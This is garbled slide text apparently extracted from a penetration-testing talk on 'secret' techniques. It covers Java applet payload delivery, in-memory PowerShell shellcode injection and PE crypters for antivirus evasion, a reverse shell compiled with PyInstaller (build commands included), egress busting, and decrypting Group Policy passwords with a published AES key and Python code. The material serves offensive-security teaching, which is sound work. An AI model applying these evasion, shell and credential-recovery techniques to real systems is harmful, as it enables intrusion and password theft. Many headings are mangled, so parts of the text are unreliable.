Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.com https://www.trustedsec.com @TrustedSec lnLroducuon
As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use. Although some may or may not be public, they are generally obscure and not well known.
The purpose of todays talk is to show you my secrets.. Some of my techniques that I use that arent widely known. Why show you? Im an open book on everything I do and sharing is what its all about. 1echnlque #1
Java Applet Attack (SET) Well known attack method right? Do you know how it actually works? Do you know the techniques behind it to make it successful? ZCMC A1
News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. Made me feel kind of special =) How people found out it was set? lLlkLPuCS DEMO:
Walking through the Attack Lxplalnlng Lhe AppleL
Parameters that are injected into the HTML code are pulled from the Applet. Obfuscated and randomized each time. Parameters tell the Applet which attacks to use. MeLhod 1 - 8lnary uropper
Binary is downloaded from attacker machine via web server (Java downloader) Obfuscated binary each time per deployment.. Combination of PE manipulation, UPX, and rewriting binary on y (import pele)
DEMO:
Binary Dropping Technique MeLhod 1 - Weak Sauce
Binarys are easily picked up by AV if signatures focus on obfuscation techniques. (SET changes them each version) Direct interaction with Windows le system and writing to disk. Multiple points of evidence on victim machine. MeLhod 2 - Shellcodeexec
Shellcodeexec method drops a custom compiled and modied version of shellcodeexec by Bernardo Damele. Executable takes int main(int argc, char*argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space. Alphanumeric shellcode is executed in memory and payload is delivered. DEMO:
ShellcodeExec MeLhod 2 - Laslly deLecLable
Shellcodeexec is a simple yet awesome method but still has a number of drawbacks. Like Method 1 Binarys can be picked up unless custom version created. Direct interaction with Windows le system and writing to disk. Like Method 1 - Multiple points of evidence on victim machine. MeLhod 3 - owershell ln[ecuon
Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8). Powershell gives us complete exibility on a number of post exploitation situations. Technique discovered by Matthew Graeber (you rock).
MeLhod 3 - S ShellCode ln[ecuon
Applet detects if powershell is installed on system. Grabs the operating system type (x86 / x64) Deploys Shellcode straight through powershell. DEMO:
ShellcodeExec MeLhod 3 - owershell ln[ecuon
Never touches disk AV / HIPS signatures go out the door. Obfuscated each time so that memory inspection is extremely dicult. Extremely reliable and stable. PE Security Evasion Scenarlo 1 - uropplng L's llke lLs hoL
Your using Metasploit All of them are being picked up by AV, HIPS, etc. Most cases, I will rewrite the exe template for Metasploit to customize binary for evasion. Couple cool ways to do this. Modlfylng L lor Lvaslon ln MSl
Easiest way for me is to make a simple program that creates a RWX process then have the program execute Metasploit Shellcode.
You can also modify the Metasploit exe.rb template and obfuscate the code that way. L CrypLers
One of my favorites was recently released called Hyperion (Christian Ammann from nullsecurity.net). Encrypts PE the le using a randomized simple cipher key with AES 128. When executable is run, it brute forces the AES key then decrypts the PE le for you. DEMO: Hyperion Pyperlon Lncrypuon
Very cool concept and easy to use and write one for yourself. Ability to have a completely unique PE le each time. Slight downfall, stub used for brute force is not polymorphic. Building a Simple Reverse Shell 1he 8everse Shell Connects out to the attacker (reverse shell). Complllng 8lnarles PyInstaller Compiles python code for you into a binary by wrapping the Python Interpreter into the executable. Works on Linux, OSX, and Windows. python Congure.py python Makespec.py onele noconsole shell.py python Build.py shell/shell.spec cd shell\dist
Maklng lL easy - pybulld.py All code and samples will be released on the TrustedSec website soon.
DEMO: Building a Shell 8ypasslng Av Finding your way home 8umplng Lhe llrewall
A number of companies restrict ports outbound and only allow whats needed for the business. Trouble getting payloads out, especially if you only have one shot. Lgress 8usung
Few ways to do it, pre-staged payload for identifying way out. Attempt staged reverse on every port. Metasploit has an ALLPORTS payload as well. Lgress 8usLer 0.2
Server/Client situation where victim connects out on every port 1024 ports at a time. Server listens for connection and reports back. Heres where you can have some fun. Egress Buster Reverse Shell Lgress 8usLer 8everse Shell
Released this week! Allows you to bust all ports inside the rewall and spawn a command shell. Custom, so no AV picks this up. Byte compiled into an executable. DEMO:
Recent Penetration Test Found le upload + execute binarys. Could not nd a standard port out i.e. 80, 443, 53, 25, etc. Wrote this to deploy and found several obscure ports that were allowed. Fun with Group Policy Cne of my L8SCnAL lavorlLes
How many times have we been on a pentest with just a domain user? Need that local administrator account for all of the domain computers? Research from: Sogeti ESEC Pentest
Navigate to a domain controller and hit up the SYSVOL share. Head to the domain name and Policies folder. Look for a GUID then MACHINE \Preferences\Group. Look for the Groups.xml le. ConLenLs of llle SLauc key for ALS Anyone? yLhon Code # code was developed and created from # http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
from Crypto.Cipher import AES from base64 import b64decode
key = """ 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b """.replace(" ","").replace("\n","").decode('hex')
>>> print o[:-ord(o[-1])].decode('utf16') Local*P4ssword! Expanding on Group.xml More asswords SLored
The folks over at rewt dance ( http://rewtdance.blogspot.com/ 2012/06/exploiting-windows-2008- group-policy.html) found a few more areas that store passwords using the cpassword attribute. Services, ScheduledTasks, SQL servers and much more are impacted.
LlsL of CLher AecLed Areas (from rewL dance) Services\Services.xml http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)
Hopefully can make these a series. uownloads For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.
Secret Pentesting Techniques Shhh...
Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.com https://www.trustedsec.com TrustedSec, LLC @TrustedSec